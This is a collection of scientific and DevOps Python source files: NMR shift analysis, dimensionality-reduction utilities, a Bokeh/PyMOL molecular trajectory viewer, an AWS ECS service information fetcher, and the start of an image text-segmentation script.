resn = str(residue[0].split('_')[1])
try:
nset = '%s_%s/%s' % (resid, resn, atom_type)
dset = f[nset]
y, x = np.histogram(dset, bins=50)
row = cs[(cs['resid'] == resid) & (cs['resn'] == resn) & (cs['atom_type'] == atom_type)]
# Get Delta_delta CS
x = x[:-1] - row['rc'].values[0]
# Get density (something is wrong with numpy density ...)
y = y / np.float(np.sum(y))
# For the small picture !
fig, ax = plt.subplots(figsize=(6, 2))
ax.plot(x, y, linestyle='-', color=color)
ax.plot(row['dobs'], 0, marker='^', markersize=30, color='black')
ax.plot(row['dpred'], 0, marker='^', markersize=25, color=color)
ax.set_ylim(0, 0.20)
ax.set_xlim(-xmax, xmax)
ax.set_ylabel('Population', fontsize=20)
ax.set_xlabel(r'$\Delta\delta$ (ppm)', fontsize=20)
fig_name = "%s/%s_%s.png" % (out_dir, resid, resn)
fig.savefig(fig_name, dpi=300, format='png', bbox_inches='tight')
plt.close(fig)
# And now the BIG picture !
axB[irow, icol].plot(x, y, linestyle='-', color=color)
axB[irow, icol].plot(row['dobs'], 0, marker='^', markersize=30, color='black')
axB[irow, icol].plot(row['dpred'], 0, marker='^', markersize=25, color=color)
axB[irow, icol].set_ylim(0, 0.20)
axB[irow, icol].set_xlim(-xmax, xmax)
axB[irow, icol].set_title("%s - %s" % (resid, resn))
if icol == 0:
axB[irow, icol].set_ylabel('Population', fontsize=15)
if irow == rows - 1:
axB[irow, icol].set_xlabel(r'$\Delta\delta$ (ppm)', fontsize=15)
icol += 1
if icol == cols:
icol = 0
irow += 1
except KeyError:
pass
fig_name = "%s/distribution_%s_all.png" % (out_dir, atom_type)
figB.savefig(fig_name, dpi=300, format='png', bbox_inches='tight')
plt.close(figB)
def plot_shift_diff(cs, dssp_file=None):
color = 'chocolate'
atom_types = cs['atom_type'].unique()
label = {'CA': 'C_{\\alpha}', 'CB': 'C_{\\beta}'}
for atom_type in atom_types:
if label.has_key(atom_type):
ylabel = label[atom_type]
else:
ylabel = atom_type
tmp = cs.loc[cs['atom_type'] == atom_type]
std_neg = tmp['diff'] - tmp['std']
std_neg[std_neg < 0.] = 0.
std_pos = tmp['diff'] + tmp['std']
fig, ax = plt.subplots(figsize=(12,4))
ax.plot(tmp['resid'], tmp['diff'], color=color)
ax.fill_between(tmp['resid'], std_neg, std_pos, color=color, alpha=0.4)
if dssp_file:
plot_dssp_info(ax, tmp['resid'], 0, 10., dssp_file)
ax.set_ylim(-1, 10.)
ax.set_xlim(np.min(tmp['resid'] - 1), np.max(tmp['resid']) + 1)
ax.set_xlabel('Residue', fontsize=20)
ax.set_ylabel(r'$\delta %s$ |$\delta_{\mathrm{pred}}-\delta_{\mathrm{exp}}$| (ppm)' % ylabel, fontsize=20)
fig_name = "diff_shift_%s.png" % (atom_type)
fig.savefig(fig_name, dpi=300, format='png', bbox_inches='tight')
plt.close(fig)
def replace_bfactors(cs, column, pdb_file, filename='new_pdb', na_value=-1):
atom_types = cs['atom_type'].unique()
for atom_type in atom_types:
new_pdb_file = '%s_%s.pdb' % (filename, atom_type)
tmp = cs.loc[cs['atom_type'] == atom_type]
with open(pdb_file, 'r') as f, open(new_pdb_file, 'w') as w:
for line in f:
if re.search('^ATOM', line):
resid = int(line[22:26])
row = tmp.loc[(tmp['resid'] == resid) & (tmp['atom_type'] == atom_type)]
try:
value = row[column].values[0]
if np.isnan(value):
value = na_value
except:
value = na_value
line = line[0:60] + '%6.2f' % value + line[66:-1]
w.write('%s\n' % line)
else:
w.write(line)
def main():
parser = argparse.ArgumentParser(description='Analyze NMR chemical shift')
parser.add_argument('-c', "--obs", dest='obsfile', required = True, \
action="store", type=str, \
help = "bmrb file with experimental chemical shift")
parser.add_argument("-h5", dest='h5file', required = True, \
action = "store", type=str, \
help = "provide a hdf5 file with all nmr data")
parser.add_argument("-d", "--dssp", dest='dsspfile', \
action = "store", type=str, default = None, \
help = "provide a dssp file for secondary structure")
parser.add_argument("--distribution", dest='distribution', \
action = "store_true", default = False, \
help = "if we want to plot all the distribution")
parser.add_argument("-p", '--pdb', dest='pdb_file', \
action = "store", default = None, \
help = "pdb file (bfactors replaced by shift diff)")
parser.add_argument('--start', dest="start", default=0,
action="store", type=int,
help='number of the first frame (0 based)')
parser.add_argument('--stop', dest="stop", default=-1,
action="store", type=int,
help='number of the last frame (excluded)')
options = parser.parse_args()
obs_file = options.obsfile
hdf_file = options.h5file
dssp_file = options.dsspfile
distribution = options.distribution
pdb_file = options.pdb_file
start = options.start
stop = options.stop
try:
shiftx2_dir = os.environ['SHIFTX2_DIR']
rc_file = shiftx2_dir + '/lib/RandomCoil.csv'
except KeyError:
print 'Error: The environ variable SHIFTX2_DIR is not set !'
sys.exit(1)
# Get obs and random coil
cs_obs = get_obs(obs_file)
# Get mean and std pred
cs_pred = get_pred(hdf_file, cs_obs['atom_type'].unique(), start, stop)
# Get Random coil values
rc = get_random_coil(rc_file)
# Merge all the data together
cs = pd.merge(cs_obs, cs_pred, how='right', on=['resid', 'resn', 'atom_type'])
cs = cs.sort_values(by='resid').reset_index(drop=True)
cs = pd.merge(cs, rc, how='left', on=['resn', 'atom_type'])
# Get Delta_delta chemical shift
cs['dobs'] = cs['obs'] - cs['rc']
cs['dpred'] = cs['pred'] - cs['rc']
# Get diff between pred and obs
cs['diff'] = np.abs(cs['pred'] - cs['obs'])
# Compute RMSD between obs and pred for each atom type
for atom_type in cs['atom_type'].unique():
tmp = cs.loc[cs['atom_type'] == atom_type]
print '%3s %5.3f' % (atom_type, rmsd(tmp['dobs'], tmp['dpred']))
# Save and plot data
cs.to_csv('shift_resume.csv', index=False, na_rep='NaN')
plot_shift(cs, dssp_file)
plot_shift_diff(cs, dssp_file)
if pdb_file:
replace_bfactors(cs, 'diff', pdb_file, 'diff_shift', na_value=-1)
if distribution:
plot_distribution(cs, hdf_file)
if __name__=="__main__":
main()
sys.exit(0)
```
|
{
"source": "jeeberhardt/unrolr",
"score": 2
}
|
#### File: unrolr/core/pca.py
```python
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import numpy as np
from scipy import linalg
__author__ = "<NAME>"
__copyright__ = "Copyright 2020, <NAME>"
__lience__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
class PCA:
def __init__(self, n_components=None):
"""Create DihedralPCa object
Args:
n_components (int, None): Number of components to keep. if n_components is not set all components are kept.
"""
self._n_components = n_components
self.components = None
self.singular_values = None
def fit_transform(self, X):
"""Fit the model with X and apply the dimensionality reduction on X.
Args:
X (ndarray): array-like, shape (n_samples, n_features)
Returns:
ndarray: final embedding (n_samples, n_components)
"""
# Centering the data
X -= np.mean(X, axis=0)
# Compute covariance matrix
cov = np.cov(X, rowvar=False)
# PCA!!!
singular_values , components = linalg.eigh(cov)
# Sort by singular values
idx = np.argsort(singular_values)[::-1]
self.components = components[:, idx].T
self.singular_values = singular_values[idx]
if self._n_components is None:
embedding = np.dot(X, self.components)
else:
embedding = np.dot(X, self.components[:int(self._n_components)].T)
return embedding
```
#### File: unrolr/sampling/sampling.py
```python
import numpy as np
import pandas as pd
from .. import Unrolr
__author__ = "<NAME>"
__copyright__ = "Copyright 2020, <NAME>"
__lience__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
def neighborhood_radius_sampler(X, r_neighbors, metric="dihedral", n_components=2,
n_iter=5000, n_runs=5, init="random", platform="OpenCL"):
"""Sample different neighborhood radius rc and compute the stress and correlation.
Args:
X (ndarray): n-dimensional ndarray (rows: frames; columns: features/angles)
r_neighbors (array-like): list of the neighborhood raidus cutoff to try
metric (str): metric to use to compute distance between conformations (dihedral or intramolecular) (default: dihedral)
n_components (int): number of dimension of the embedding
n_iter (int): number of optimization cycles
n_runs (int): number of repetitions, in order to calculate standard deviation
init (str): method to initialize the initial embedding (random or pca)(default: random)
platform (str): platform to use for spe (OpenCL or CPU) (default: OpenCL)
Returns:
results (DataFrame): Pandas DataFrame containing columns ["run", "r_neighbor", "n_iter", "stress", "correlation"]
"""
columns = ["run", "r_neighbor", "n_iter", "stress", "correlation"]
data = []
for r_neighbor in r_neighbors:
U = Unrolr(r_neighbor, metric, n_components, n_iter, init=init, platform=platform)
for i in range(n_runs):
U.fit_transform(X)
data.append([i, r_neighbor, n_iter, U.stress, U.correlation])
df = pd.DataFrame(data=data, columns=columns)
return df
def optimization_cycle_sampler(X, n_iters, r_neighbor, metric="dihedral", n_components=2,
n_runs=5, init="random", platform="OpenCL"):
"""Sample different number of optimization cycle with a certain
neighborhood radius rc and compute the stress and correlation.
Args:
X (ndarray): n-dimensional ndarray (rows: frames; columns: features/angles)
n_iters (array-like): list of the iteration numbers to try
r_neighbor (float): neighborhood raidus cutoff
metric (str): metric to use to compute distance between conformations (dihedral or intramolecular) (default: dihedral)
n_components (int): number of dimension of the embedding
n_runs (int): number of repetitions, in order to calculate standard deviation
init (str): method to initialize the initial embedding (random or pca)(default: random)
platform (str): platform to use for spe (OpenCL or CPU) (default: OpenCL)
Returns:
results (DataFrame): Pandas DataFrame containing columns ["run", "r_neighbor", "n_iter", "stress", "correlation"]
"""
columns = ["run", "r_neighbor", "n_iter", "stress", "correlation"]
data = []
for n_iter in n_iters:
U = Unrolr(r_neighbor, metric, n_components, n_iter, init=init, platform=platform)
for i in range(n_runs):
U.fit_transform(X)
data.append([i, r_neighbor, n_iter, U.stress, U.correlation])
df = pd.DataFrame(data=data, columns=columns)
return df
```
#### File: unrolr/utils/utils.py
```python
from __future__ import print_function
import os
import sys
if sys.version_info >= (3, ):
import importlib
else:
import imp
import h5py
import pyopencl as cl
import numpy as np
__author__ = "<NAME>"
__copyright__ = "Copyright 2018, <NAME>"
__lience__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
def read_dataset(fname, dname, start=0, stop=-1, skip=1):
"""Read dataset from HDF5 file."""
data = None
try:
with h5py.File(fname, 'r') as f:
if stop == -1:
return f[dname][start::skip,]
else:
return f[dname][start:stop:skip,]
except IOError:
print("Error: cannot find file %s." % fname)
return data
def save_dataset(fname, dname, data):
"""Save dataset to HDF5 file."""
with h5py.File(fname, 'w') as w:
try:
dset = w.create_dataset(dname, (data.shape[0], data.shape[1]))
dset[:] = data
except:
pass
w.flush()
def transform_dihedral_to_metric(dihedral_timeseries):
"""Convert angles in radians to sine/cosine transformed coordinates.
The output will be used as the PCA input for dihedral PCA (dPCA)
Args:
dhedral_timeseries (ndarray): array containing dihedral angles, shape (n_samples, n_features)
Returns:
ndarray: sine/cosine transformed coordinates
"""
new_shape = (dihedral_timeseries.shape[0] * 2, dihedral_timeseries.shape[1])
data = np.zeros(shape=new_shape, dtype=np.float32)
for i in range(dihedral_timeseries.shape[0]):
data[(i * 2)] = np.cos(dihedral_timeseries[i])
data[(i * 2) + 1] = np.sin(dihedral_timeseries[i])
return data
def transform_dihedral_to_circular_mean(dihedral_timeseries):
"""Convert angles in radians to circular mean transformed angles.
The output will be used as the PCA input for dihedral PCA+ (dPCA+)
Args:
dhedral_timeseries (ndarray): array containing dihedral angles, shape (n_samples, n_features)
Returns:
ndarray: circular mean transformed angles
"""
cm = np.zeros(shape=dihedral_timeseries.shape, dtype=np.float32)
# Create a flat view of the numpy arrays.
cmf = cm.ravel()
dtf = dihedral_timeseries.ravel()
x = np.cos(dtf)
y = np.sin(dtf)
# In order to avoid undefined mean angles
zero_y = np.where(y == 0.)[0]
if zero_y.size > 0:
y[zero_y] += 1E6
# Cases x > 0 and x < 0 are combined together
nonzero_x = np.where(x != 0.)
neg_x = np.where(x < 0.)
sign_y = np.sign(y)
# 1. x > 0
cmf[nonzero_x] = np.arctan(y[nonzero_x] / x[nonzero_x])
# 2. x < 0
cmf[neg_x] += sign_y[neg_x] * np.pi
# Case when x equal to 0
zero_x = np.where(x == 0.)[0]
if zero_x.size > 0:
cmf[zero_x] = sign_y[zero_x] * (np.pi / 2.)
return cm
def is_opencl_env_defined():
"""Check if OpenCL env. variable is defined."""
variable_name = "PYOPENCL_CTX"
if os.environ.get(variable_name):
return True
else:
return False
def path_module(module_name):
try:
specs = importlib.machinery.PathFinder().find_spec(module_name)
if specs is not None:
return specs.submodule_search_locations[0]
except:
try:
_, path, _ = imp.find_module(module_name)
abspath = os.path.abspath(path)
return abspath
except ImportError:
return None
return None
def max_conformations_from_dataset(fname, dname):
"""Get maximum number of conformations that can fit
into the memory of the selected OpenCL device and
also the step/interval """
if not is_opencl_env_defined():
print("Error: The environnment variable PYOPENCL_CTX is not defined.")
print("Tip: python -c \"import pyopencl as cl; cl.create_some_context()\"")
sys.exit(1)
ctx = cl.create_some_context()
max_size = int(ctx.devices[0].max_mem_alloc_size)
try:
with h5py.File(fname, 'r') as f:
bytes_size = f[dname].dtype.itemsize
n_conf, n_dim = f[dname].shape
data_size = bytes_size * n_conf * n_dim
except IOError:
print("Error: cannot find file %s." % fname)
if data_size > max_size:
""" Return the first interval that produces a dataset
with a size inferior than max_size """
for i in range(1, n_conf):
if n_conf % i == 0:
tmp_size = (n_conf / i) * n_dim * bytes_size
if tmp_size <= max_size:
return (n_conf / i, i)
# Return None if we didn't find anything
return (None, None)
else:
return (data_shape[0], 1)
```
|
{
"source": "jeeberhardt/visualize",
"score": 3
}
|
#### File: visualize/scripts/run_servers.py
```python
from __future__ import print_function
import time
import shlex
import subprocess
__author__ = "<NAME>"
__copyright__ = "Copyright 2016, <NAME>"
__lience__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
def execute_command(cmd_line):
args = shlex.split(cmd_line)
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, errors = p.communicate()
return output, errors
def start_screen_command(cmd, session_name):
cmd_line = "screen -d -m -S %s %s" % (session_name, cmd)
return execute_command(cmd_line)
def stop_screen_command(session_name):
cmd_line = "screen -S %s -X quit" % session_name
return execute_command(cmd_line)
def main():
try:
# Start Bokeh server and PyMOL
start_screen_command("bokeh serve", "visu_bokeh")
start_screen_command("pymol -R", "visu_pymol")
# Dirty hack to be sure Bokeh and Pymol are running...
while True:
time.sleep(3600)
except KeyboardInterrupt:
pass
finally:
# Kill all screen session
stop_screen_command("visu_bokeh")
stop_screen_command("visu_pymol")
if __name__ == "__main__":
main()
```
#### File: visualize/scripts/visualize.py
```python
from __future__ import print_function
import os
import sys
import random
import argparse
import warnings
import subprocess
import numpy as np
from xmlrpclib import ServerProxy
from MDAnalysis import Universe
from bokeh.client import push_session
from bokeh.models import HoverTool, ColumnDataSource
from bokeh.plotting import figure, curdoc
from matplotlib.cm import get_cmap
from matplotlib import colors
warnings.filterwarnings("ignore")
__author__ = "<NAME>"
__copyright__ = "Copyright 2016, <NAME>"
__lience__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
class Visualize():
def __init__(self, top_file, dcd_files, config_file):
# Start Bokeh server
if not self.is_screen_running("visu_bokeh"):
print("Error: Bokeh is not running")
sys.exit(1)
# Start PyMOL
if not self.is_screen_running("visu_pymol"):
print("Error: Pymol is not running")
sys.exit(1)
# Open DCD trajectory
self.u = Universe(top_file, dcd_files)
# Read configuration file
self.comments = self.read_comments(config_file)
self.coord, self.frames, self.energy = self.read_configuration(config_file)
def is_screen_running(self, sname):
output = subprocess.check_output(["screen -ls; true"], shell=True)
return [l for l in output.split("\n") if sname in l]
def read_configuration(self, config_file):
"""
Read configuration file
"""
coord = None
frames = None
energy = None
data = np.loadtxt(config_file, delimiter=',')
if data.shape[1] == 2:
coord = np.fliplr(data[:, 0:])
frames = np.arange(0, coord.shape[0])
energy = None
#print(coord)
#print(frames)
#print(energy)
elif data.shape[1] == 3:
coord = np.fliplr(data[:, 1:])
frames = data[:, 0]
energy = None
elif data.shape[1] == 4:
coord = np.fliplr(data[:, 1:3])
frames = data[:, 0]
energy = data[:, 3]
else:
print("Error: Cannot read coordinates file! (#Columns: %s)" % data.shape[1])
sys.exit(1)
return coord, frames, energy
def read_comments(self, fname, comments="#"):
with open(fname) as f:
for line in f:
if comments in line:
line = line.replace("%s " % comments, "")
return {pname: pvalue for pname, pvalue in zip(line.split(" ")[::2], line.split(" ")[1::2])}
return None
def update_pymol(self, indices):
rpc_port = 9123
if indices:
frames = []
for indice in indices:
i, j = self.id_to_H_frame[indice]
frames = np.concatenate((frames, np.trim_zeros(self.H_frame[i, j], "b")))
nb_frames = frames.shape[0]
if nb_frames > self.max_frame:
print("Too much frames (%s). So we choose %s structures randomly." % (nb_frames, self.max_frame))
frames = random.sample(frames, self.max_frame)
try:
pymol = ServerProxy(uri="http://localhost:%s/RPC2" % rpc_port)
pymol.do("delete s*")
for frame in frames:
frame = np.int(frame)
# Go to the frame
self.u.trajectory[frame]
# Write the PDB file
self.u.atoms.write("structure.pdb")
try:
pymol.load("%s/structure.pdb" % os.getcwd())
except:
print("Can\"t load PDB structure !")
pass
if self.cartoon:
pymol.show("cartoon")
else:
pymol.show("ribbon")
pymol.hide("lines")
pymol.do("copy s%s, structure" % frame)
pymol.delete("structure")
pymol.do("show sticks, organic")
if np.int(frames[0]) != frame and nb_frames > 1:
pymol.do("align s%d, s%d" % (frame, frames[0]))
pymol.do("center s%s" % frame)
except:
print("Connection issue with PyMol! (Cmd: pymol -R)")
def get_selected_frames(self, attr, old, new):
self.update_pymol(new["1d"]["indices"])
def generate_color(sefl, value, cmap):
return colors.rgb2hex(get_cmap(cmap)(value))
def assignbins2D(self, coordinates, bin_size):
x_min, x_max = np.min(coordinates[:, 0]), np.max(coordinates[:, 0])
y_min, y_max = np.min(coordinates[:, 1]), np.max(coordinates[:, 1])
x_length = (x_max - x_min)
y_length = (y_max - y_min)
x_center = x_min + (x_length/2)
y_center = y_min + (y_length/2)
if x_length > y_length:
x_limit = np.array([x_center-(x_length/2)-0.5, x_center+(x_length/2)+0.5])
y_limit = np.array([y_center-(x_length/2)-0.5, y_center+(x_length/2)+0.5])
else:
x_limit = np.array([x_center-(y_length/2)-0.5, x_center+(y_length/2)+0.5])
y_limit = np.array([y_center-(y_length/2)-0.5, y_center+(y_length/2)+0.5])
x_bins = np.arange(float(x_limit[0]), (float(x_limit[1]) + bin_size), bin_size)
y_bins = np.arange(float(y_limit[0]), (float(y_limit[1]) + bin_size), bin_size)
return x_bins, y_bins
def show(self, bin_size=0.025, min_bin=0, max_frame=25, cartoon=False):
# Store some informations
self.bin_size = bin_size
self.min_bin = min_bin
self.max_frame = max_frame
self.cartoon = cartoon
self.H_frame = None
self.id_to_H_frame = []
title = ""
xx, yy = [], []
count, color, e = [], [], []
# Get edges
edges_x, edges_y = self.assignbins2D(self.coord, bin_size)
# Get 2D histogram, just to have the number of conformation per bin
H, edges_x, edges_y = np.histogram2d(self.coord[:, 0], self.coord[:, 1], bins=(edges_x, edges_y))
# ... and replace all zeros by nan
H[H == 0.] = np.nan
# Initialize histogram array and frame array
tmp = np.zeros(shape=(edges_x.shape[0], edges_y.shape[0], 1), dtype=np.int32)
try:
self.H_frame = np.zeros(shape=(edges_x.shape[0], edges_y.shape[0], np.int(np.nanmax(H))), dtype=np.int32)
except MemoryError:
print('Error: Histogram too big (memory). Try with a bigger bin size.')
sys.exit(1)
if self.energy is not None:
H_energy = np.empty(shape=(edges_x.shape[0], edges_y.shape[0], np.int(np.nanmax(H))))
H_energy.fill(np.nan)
# Return the indices of the bins to which each value in input array belongs
# I don't know why - 1, but it works perfectly like this
ix = np.digitize(self.coord[:, 0], edges_x) - 1
iy = np.digitize(self.coord[:, 1], edges_y) - 1
# For each coordinate, we put them in the right bin and add the frame number
for i in xrange(0, self.frames.shape[0]):
# Put frame numbers in a histogram too
self.H_frame[ix[i], iy[i], tmp[ix[i], iy[i]]] = self.frames[i]
# The same for the energy, if we provide them
if self.energy is not None:
H_energy[ix[i], iy[i], tmp[ix[i], iy[i]]] = self.energy[i]
# Add 1 to the corresponding bin
tmp[ix[i], iy[i]] += 1
if self.energy is not None:
# get mean energy per bin
H_energy = np.nanmean(H_energy, axis=2)
# Get STD and MEAN conformations/energy
if self.energy is not None:
std = np.nanstd(H_energy)
mean = np.nanmean(H_energy)
else:
std = np.int(np.nanstd(H))
mean = np.int(np.nanmean(H))
# Get min_hist and max_hist
min_hist = mean - std
max_hist = mean + std
# Put min_hist equal to min_bin is lower than 0
min_hist = min_hist if min_hist > 0 else min_bin
unit = '#conf.' if self.energy is None else 'Kcal/mol'
print("Min: %8.2f Max: %8.2f (%s)" % (min_hist, max_hist, unit))
# Add we keep only the bin with structure
for i in xrange(0, H.shape[0]):
for j in xrange(0, H.shape[1]):
if H[i, j] > min_bin:
xx.append(edges_x[i])
yy.append(edges_y[j])
self.id_to_H_frame.append((i, j))
count.append(H[i, j])
if self.energy is None:
value = 1. - (np.float(H[i, j]) - min_hist) / (max_hist - min_hist)
else:
value = (np.float(H_energy[i, j]) - min_hist) / (max_hist - min_hist)
e.append(H_energy[i, j])
color.append(self.generate_color(value, "jet"))
TOOLS = "wheel_zoom,box_zoom,undo,redo,box_select,save,reset,hover,crosshair,tap,pan"
# Create the title with all the parameters contain in the file
if self.comments:
for key, value in self.comments.iteritems():
title += "%s: %s " % (key, value)
else:
title = "#conformations: %s" % self.frames.shape[0]
p = figure(plot_width=1500, plot_height=1500, tools=TOOLS, title=title)
p.title.text_font_size = '20pt'
# Create source
source = ColumnDataSource(data=dict(xx=xx, yy=yy, count=count, color=color))
if self.energy is not None:
source.add(e, name="energy")
# Create histogram
p.rect(x="xx", y="yy", source=source, width=bin_size, height=bin_size,
color="color", line_alpha="color", line_color="black")
# Create Hovertools
tooltips = [("(X, Y)", "(@xx @yy)"), ("#Frames", "@count")]
if self.energy is not None:
tooltips += [("Energy (Kcal/mol)", "@energy")]
hover = p.select({"type": HoverTool})
hover.tooltips = tooltips
# open a session to keep our local document in sync with server
session = push_session(curdoc())
# Update data when we select conformations
source.on_change("selected", self.get_selected_frames)
# Open the document in a browser
session.show(p)
# Run forever !!
session.loop_until_closed()
def parse_options():
parser = argparse.ArgumentParser(description="visu 2D configuration")
parser.add_argument("-t", "--top", dest="top_file", required=True,
action="store", type=str,
help="psf or pdb file used for simulation")
parser.add_argument("-d", "--dcd", dest="dcd_files", required=True,
action="store", type=str, nargs="+",
help="list of dcd files")
parser.add_argument("-c", "--configuration", dest="config_file",
required=True, action="store", type=str,
help="configuration file")
parser.add_argument("-b", "--bin", dest="bin_size", default=0.025,
action="store", type=float,
help="bin size of the histogram")
parser.add_argument("--max-frame", dest="max_frame", default=25,
action="store", type=int,
help="maximum number of randomly picked frames")
parser.add_argument("--min-bin", dest="min_bin", default=0,
action="store", type=int,
help="minimal number of frames needed to show the bin")
parser.add_argument("--cartoon", dest="cartoon", default=False,
action="store_true",
help="Turn on cartoon representation in PyMOL")
args = parser.parse_args()
return args
def main():
options = parse_options()
top_file = options.top_file
dcd_files = options.dcd_files
config_file = options.config_file
bin_size = options.bin_size
cartoon = options.cartoon
max_frame = options.max_frame
min_bin = options.min_bin
V = Visualize(top_file, dcd_files, config_file)
V.show(bin_size, min_bin, max_frame, cartoon)
if __name__ == "__main__":
main()
```
|
{
"source": "jeechu/cloudlift",
"score": 2
}
|
#### File: cloudlift/deployment/service_information_fetcher.py
```python
from re import search
from cloudlift.config import get_client_for
from cloudlift.config import get_cluster_name, get_service_stack_name
from cloudlift.config import get_region_for_environment
from cloudlift.config.logging import log, log_warning, log_intent
from cloudlift.deployment.ecs import DeployAction, EcsClient
from cloudlift.exceptions import UnrecoverableException
class ServiceInformationFetcher(object):
def __init__(self, name, environment, service_configuration):
self.name = name
self.environment = environment
self.cluster_name = get_cluster_name(environment)
self.cfn_client = get_client_for('cloudformation', self.environment)
self.service_configuration = service_configuration
self.service_info = {}
self.init_stack_info()
def init_stack_info(self):
stack_name = get_service_stack_name(self.environment, self.name)
try:
stack = self.cfn_client.describe_stacks(StackName=stack_name)['Stacks'][0]
self.stack_found = True
stack_outputs = {output['OutputKey']: output['OutputValue'] for output in stack['Outputs']}
for service_name, service_config in self.service_configuration.get('services', {}).items():
service_metadata = dict()
if "ecs_service_name" in service_config:
service_metadata["ecs_service_name"] = service_config.get('ecs_service_name')
else:
service_metadata["ecs_service_name"] = stack_outputs.get(f'{service_name}EcsServiceName')
service_metadata["secrets_name"] = service_config.get('secrets_name', None)
self.service_info[service_name] = service_metadata
self.listener_rules = [resource_summary for resource_summary in (self._get_stack_resource_summaries())
if resource_summary['LogicalResourceId'].endswith('ListenerRule')]
except Exception as e:
self.stack_found = False
log_warning("Could not determine services. Stack not found")
def get_current_image_uri(self):
ecr_image_uri = self._fetch_current_image_uri()
log_intent(f"Currently deployed tag: {ecr_image_uri}")
return str(ecr_image_uri)
def get_instance_ids(self):
instance_ids = {}
ecs_client = get_client_for('ecs', self.environment)
for service in self.ecs_service_names:
task_arns = ecs_client.list_tasks(
cluster=self.cluster_name,
serviceName=service
)['taskArns']
tasks = ecs_client.describe_tasks(
cluster=self.cluster_name,
tasks=task_arns
)['tasks']
container_instance_arns = [
task['containerInstanceArn'] for task in tasks
]
container_instances = ecs_client.describe_container_instances(
cluster=self.cluster_name,
containerInstances=container_instance_arns
)['containerInstances']
service_instance_ids = [
container['ec2InstanceId'] for container in container_instances
]
instance_ids[service] = service_instance_ids
return instance_ids
def get_version(self, print_image=False, print_git=False):
image = self._fetch_current_image_uri()
tag = image.split(':').pop()
if print_image:
print(image)
return
if print_git:
print(search("^[0-9a-f]{5,40}", tag).group())
return
print(tag)
def _fetch_current_image_uri(self):
ecs_client = get_client_for('ecs', self.environment)
if len(self.service_info) < 1:
raise UnrecoverableException("cannot get running image_uri: no ECS services found")
logical_service_name = next(iter(self.service_info))
ecs_service_name = self.service_info[logical_service_name].get('ecs_service_name')
task_arns = ecs_client.list_tasks(
cluster=self.cluster_name,
serviceName=ecs_service_name
)['taskArns']
if len(task_arns) < 1:
raise UnrecoverableException("cannot get running image_uri: no task ARNs found for service")
tasks = ecs_client.describe_tasks(
cluster=self.cluster_name,
tasks=task_arns
)['tasks']
task_definition_arns = tasks[0]['taskDefinitionArn']
task_definition = ecs_client.describe_task_definition(
taskDefinition=task_definition_arns
)
return task_definition['taskDefinition']['containerDefinitions'][0]['image']
def _get_stack_resource_summaries(self):
stack_name = get_service_stack_name(self.environment, self.name)
response = self.cfn_client.list_stack_resources(StackName=stack_name)
resource_summaries = response['StackResourceSummaries']
while 'NextToken' in response:
response = self.cfn_client.list_stack_resources(
StackName=stack_name,
NextToken=response['NextToken'],
)
resource_summaries.extend(response.get('Rules', []))
return resource_summaries
def get_existing_listener_rule_summary(self, service_name):
return next((rule for rule in self.listener_rules if rule['LogicalResourceId'].startswith(service_name)), None)
def fetch_current_desired_count(self):
desired_counts = {}
try:
deployment_ecs_client = EcsClient(None, None, get_region_for_environment(self.environment))
for logical_service_name, service_config in self.service_info.items():
deployment = DeployAction(deployment_ecs_client, self.cluster_name, service_config["ecs_service_name"])
desired_counts[logical_service_name] = deployment.service.desired_count
log("Existing service counts: " + str(desired_counts))
except Exception:
pass
return desired_counts
def get_current_deployment_identifier(self):
ecs_client = get_client_for('ecs', self.environment)
if len(self.service_info) < 1:
return None
logical_service_name = next(iter(self.service_info))
ecs_service_name = self.service_info[logical_service_name].get('ecs_service_name')
if ecs_service_name is None:
return None
task_arns = ecs_client.list_tasks(
cluster=self.cluster_name,
serviceName=ecs_service_name
)['taskArns']
if len(task_arns) < 1:
return None
tasks = ecs_client.describe_tasks(
cluster=self.cluster_name,
tasks=task_arns
)['tasks']
if len(tasks) < 1:
return None
task_definition_arns = tasks[0]['taskDefinitionArn']
task_definition = ecs_client.describe_task_definition(
taskDefinition=task_definition_arns,
include=[
'TAGS',
]
)
return next((tagDict['value'] for tagDict in task_definition['tags'] if tagDict['key'] == 'deployment_identifier'), None)
```
|
{
"source": "Jeeeeeiel/dipexpt",
"score": 3
}
|
#### File: Jeeeeeiel/dipexpt/dipexpt5.py
```python
import numpy as np
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFilter
from PIL import ImageEnhance
import matplotlib.pyplot as plt
import math
import os
# import pytesseract
def horizontal_hist(data):
hist = np.zeros(data.shape[0])
for i in range(data.shape[0]):
hist[i] = np.sum(data[i] == 0) # count black
return hist
def vertical_hist(data):
hist = np.zeros(data.shape[1])
for i in range(data.shape[1]):
hist[i] = np.sum(data[:, i])
return hist
def split_text_line(im, data):
hist = horizontal_hist(data)
draw = ImageDraw.Draw(im)
min_line_height = 8 # min in sample image: 11
line_height = 0
text_line_record = list()
for i in range(hist.shape[0]):
if hist[i] < 3: # min in sample: 4
if line_height >= min_line_height:
text_line_record.append((i - line_height, i - 1))
draw.line([(0, i), (data.shape[1], i)])
if 0 < line_height < min_line_height:
for j in range(1, line_height + 1):
draw.line([(0, i - j), (data.shape[1], i - j)])
line_height = 0
else:
line_height += 1
# print(text_line_record)
# im.show()
return text_line_record
def split_text_column(data): # data contains single text line
min_column_width = data.shape[0] * 0.4
max_column_width = data.shape[0] * 1.0
hist = vertical_hist(data)
text_column_record = list()
max_value = np.max(hist)
column_width = 0
threshold = max_value * 0.8
i = 0
while i < data.shape[1]:
if hist[i] > threshold:
if 0 < column_width < min_column_width:
column_width += 1
if i > 1 and (i - 2 not in text_column_record) and (i - 1 not in text_column_record) and hist[i - 1] == max_value and hist[i] == max_value:
text_column_record.append(i - 2)
text_column_record.append(i - 1)
text_column_record.append(i)
column_width = 0
i += 1
continue
if min_column_width <= column_width < max_column_width:
if (i + 1) < (data.shape[1] - 1) and hist[i] <= np.max(hist[i + 1: i + math.ceil(max_column_width) - column_width + 1]):
i = i + np.argmax(hist[i + 1: i + math.ceil(max_column_width) - column_width + 1]) + 1
# elif (i + 1) < (data.shape[1] - 1) and hist[i] == max_value:
# continue_appear = 0
